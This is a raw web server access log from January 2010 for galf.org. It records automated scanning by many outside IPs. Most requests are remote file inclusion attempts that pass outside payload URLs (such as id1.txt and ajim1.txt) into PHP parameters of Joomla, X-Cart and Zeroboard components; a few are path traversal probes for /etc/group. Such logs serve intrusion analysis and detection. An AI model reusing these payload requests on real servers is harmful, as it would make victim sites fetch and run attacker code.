60.251.165.181 - - [10/Jan/2010:21:34:48 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:34:48 -0800] "GET /admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:34:48 -0800] "GET /logs/access_091214.log%20%20//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:34:48 -0800] "GET /logs//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:35:00 -0800] "GET /logs/access_091130.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.228.240.75 - - [10/Jan/2010:21:36:45 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
207.228.240.75 - - [10/Jan/2010:21:36:45 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:36:55 -0800] "GET /logs/access_091214.log//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:36:55 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:40:07 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:40:07 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:40:07 -0800] "GET /logs/access_091116.log%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:40:22 -0800] "GET /logs/access_091026.log//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:40:25 -0800] "GET /logs/access_091102.log//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:40:30 -0800] "GET /logs/access_090824.log%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:21:41:42 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:43:19 -0800] "GET /logs/access_090831.log//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:43:55 -0800] "GET /logs/access_090713.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:43:55 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:43:55 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:44:37 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:44:37 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:44:37 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:44:56 -0800] "GET /logs/access_090824.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:44:59 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:44:59 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:44:59 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:45:17 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.90.98.94 - - [10/Jan/2010:21:45:25 -0800] "GET /logs/access.log%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.90.98.94 - - [10/Jan/2010:21:45:26 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.90.98.94 - - [10/Jan/2010:21:45:26 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.90.98.94 - - [10/Jan/2010:21:47:34 -0800] "GET /logs/access_100104.log%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:49:26 -0800] "GET /logs/access_090720.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:49:40 -0800] "GET /logs/access_090720.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [10/Jan/2010:21:49:56 -0800] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [10/Jan/2010:21:49:56 -0800] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [10/Jan/2010:21:49:56 -0800] "GET /logs/access_091123.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:21:49:57 -0800] "GET /logs/access_090803.log/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:21:49:57 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:21:49:58 -0800] "GET /logs/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
209.126.254.141 - - [10/Jan/2010:21:50:22 -0800] "GET /logs/access_091123.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:21:54:19 -0800] "GET /logs/access_100104.log//?_SERVER[DOCUMENT_ROOT]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:21:54:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:21:54:19 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [10/Jan/2010:21:56:00 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
61.108.83.106 - - [10/Jan/2010:21:56:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
61.108.83.106 - - [10/Jan/2010:21:56:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
65.55.51.115 - - [10/Jan/2010:21:57:08 -0800] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:57:58 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:57:58 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:57:58 -0800] "GET /logs/access_090803.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:57:58 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:57:58 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:57:59 -0800] "GET /logs/access_090803.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:21:58:02 -0800] "GET /?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:21:58:02 -0800] "GET /logs/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:21:58:02 -0800] "GET /logs/access_090921.log/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:58:19 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:58:19 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:58:19 -0800] "GET /logs/access_090803.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:58:23 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:58:23 -0800] "GET /logs/access_090803.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:21:58:24 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:59:50 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:59:50 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:59:50 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.0" 200 4783 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:59:52 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:59:52 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:21:59:52 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:22:01:19 -0800] "GET /bbs/include/mail.inc.php?skin_board_path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:22:01:19 -0800] "GET /logs/access_091221.log%20%20//bbs/include/mail.inc.php?skin_board_path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:22:01:19 -0800] "GET /logs//bbs/include/mail.inc.php?skin_board_path=http://www.urmary.ru//script/ID/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:22:05:39 -0800] "GET /logs/access_090914.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:22:05:39 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:22:05:39 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:22:05:55 -0800] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:22:05:55 -0800] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:22:05:55 -0800] "GET /logs/access_091123.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:22:06:04 -0800] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:22:06:04 -0800] "GET /logs/access_091123.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [10/Jan/2010:22:06:04 -0800] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:06:52 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:06:52 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:06:54 -0800] "GET /logs/access_090928.log%20%20/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:00 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:02 -0800] "GET /logs/access_090928.log%20%20/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:02 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:03 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:05 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:05 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:05 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:10 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:13 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:52 -0800] "GET /logs/access_090629.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:52 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:52 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:07:53 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:22:08:01 -0800] "GET /?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:22:08:02 -0800] "GET /logs/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:04 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:05 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:05 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:22:08:09 -0800] "GET /logs/access_090921.log/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:22:08:13 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:22:08:16 -0800] "GET /logs/access_090921.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:19 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:22 -0800] "GET /logs/access_090629.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:22 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:22 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:25 -0800] "GET /logs/access_090928.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:25 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:08:25 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:09:26 -0800] "GET /forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:09:26 -0800] "GET /logs//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:09:26 -0800] "GET /logs/access_090907.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:09:44 -0800] "GET /logs/access_090921.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:10:08 -0800] "GET /logs/access_090810.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:10:21 -0800] "GET /forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:10:21 -0800] "GET /logs/access_090907.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:10:21 -0800] "GET /logs//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:10:24 -0800] "GET /logs/access_090720.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:10:34 -0800] "GET /logs/access_090921.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:22:10:38 -0800] "GET /logs/access_090525.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:10:54 -0800] "GET /logs/access_090810.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:11:12 -0800] "GET /logs/access_090720.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:12:09 -0800] "GET /forum//?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:12:09 -0800] "GET /logs//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:12:09 -0800] "GET /logs/access_090921.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
